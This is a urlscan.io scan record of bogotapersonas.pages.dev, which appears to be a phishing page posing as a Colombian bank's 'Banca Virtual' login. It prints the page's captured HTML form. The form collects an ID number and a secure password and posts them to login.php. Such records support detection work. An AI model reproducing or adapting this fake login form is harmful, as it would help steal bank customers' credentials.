bogotapersonas.pages.dev
Open in
urlscan Pro
172.66.47.162
Public Scan
Submitted URL: http://bogotapersonas.pages.dev/
Effective URL: https://bogotapersonas.pages.dev/
Submission: On December 25 via api from US — Scanned from DE
Effective URL: https://bogotapersonas.pages.dev/
Submission: On December 25 via api from US — Scanned from DE
Form analysis
1 forms found in the DOMPOST login.php
<form action="login.php" method="POST" class="p-4" id="loginForm">
<p class="text-sm text-gray-600 mb-4">Estás ingresando con tu Clave Segura. Selecciona ‘Tarjeta Débito’ para cambiar el tipo de ingreso.</p>
<div class="mb-4">
<label class="block text-sm font-medium text-gray-700" for="identificacion">Identificación</label>
<div class="flex mt-1">
<select class="block w-1/3 border border-gray-300 rounded-l-md py-2 px-3 bg-white text-gray-700 focus:outline-none focus:ring-blue-500 focus:border-blue-500" id="identificacion" name="identificacion" required="">
<option value="cc" selected="">C.C.</option>
<option value="ti">T.I.</option>
</select>
<input class="block w-2/3 border border-gray-300 rounded-r-md py-2 px-3 text-gray-700 focus:outline-none focus:ring-blue-500 focus:border-blue-500" id="numero" name="numero" placeholder="#" type="text" required="">
</div>
</div>
<div class="mb-4">
<label class="block text-sm font-medium text-gray-700" for="clave">Clave segura</label>
<div class="relative mt-1">
<input class="block w-full border border-gray-300 rounded-md py-2 px-3 text-gray-700 focus:outline-none focus:ring-blue-500 focus:border-blue-500" id="clave" name="clave" placeholder="...." type="password" required="">
<div class="absolute inset-y-0 right-0 pr-3 flex items-center text-sm leading-5">
<i class="fas fa-eye text-blue-600"></i>
</div>
</div>
</div>
<button id="submitButton" class="w-full py-2 bg-gray-200 text-gray-500 font-medium rounded-md cursor-not-allowed" disabled=""> Ingresar </button>
<div class="flex justify-between mt-4">
<a class="text-blue-600 text-sm" href="#">Registrarme ›</a>
<a class="text-blue-600 text-sm" href="#">Olvidé mi clave ›</a>
</div>
</form>
Text Content
BIENVENIDO A TU BANCA VIRTUAL ¿Nunca has ingresado a Banca Virtual? Aquí te decimos cómo hacerlo › Clave segura Tarjeta débito Estás ingresando con tu Clave Segura. Selecciona ‘Tarjeta Débito’ para cambiar el tipo de ingreso. Identificación C.C. T.I. Clave segura Ingresar Registrarme › Olvidé mi clave ›